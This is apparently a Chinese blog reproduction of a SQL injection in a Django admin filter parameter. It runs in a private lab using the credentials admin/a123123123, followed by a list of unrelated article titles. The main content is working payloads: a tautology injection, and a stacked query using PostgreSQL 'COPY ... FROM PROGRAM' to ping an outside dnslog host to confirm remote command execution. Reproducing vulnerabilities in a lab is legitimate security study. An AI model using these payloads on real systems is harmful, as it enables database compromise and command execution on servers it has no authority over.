复现

访问http://192.168.49.2:8000/admin

输入用户名admin ,密码a123123123

然后构造URL进行查询,payload:

http://192.168.49.2:8000/admin/vuln/collection/?detail__a'b=123

http://192.168.49.2:8000/admin/vuln/collection/?detail__title')='1' or 1=1--

发现存在sql注入

使用dnslog检测是否可以执行命令

http://192.168.49.2:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping q60qaa.dnslog.cn'--%20

最新文章

  1. JavaScript高级程序设计-(4) 引用类型
  2. Android资源站
  3. 谢欣伦 - OpenDev原创例程 - 串口助手Comm Assist
  4. Android—对话框
  5. Css 单图片按钮实例(css 图片变换)
  6. [resource]23个python的机器学习包
  7. Handler sendMessage 与 obtainMessage (sendToTarget)
  8. Index Full Scan vs Index Fast Full Scan-1103
  9. spring简单入门示例
  10. mysql 查询重复的(不区分大小写)数据的SQL优化
  11. UITextField总结--博主总结的真好
  12. 如何判断浏览器为ie10以上
  13. 如何在ASP.NET Core Web API测试中使用Postman
  14. Python基础之协程
  15. vs2017 在win10下安装后开始运行asp.net core 项目时出错
  16. Django框架----视图(views)
  17. 含有选择器的 bootstrap菜单
  18. 【转】细谈Redis和Memcached的区别
  19. 使用msiexec.exe绕过应用程序白名单(多种方法)
  20. nodejs学习笔记四(模块化、在npm上发布自己的模块)

热门文章

  1. MIT6.828 Lab2 内存管理
  2. npm ERR! Unexpected end of JSON input while parsing near '...'解决方法
  3. Centos7安装配置jenkins(Tomcat)
  4. kubernetes的存活探针和就绪探针
  5. 单片机引脚扩展芯片74HC595手工分解实验
  6. layui 监听checkbox 、radio、switch选中改变事件
  7. Redis主从,集群部署及迁移
  8. Java Set HashSet
  9. 深入理解 Go Map
  10. Redis和Memcached到底有什么区别?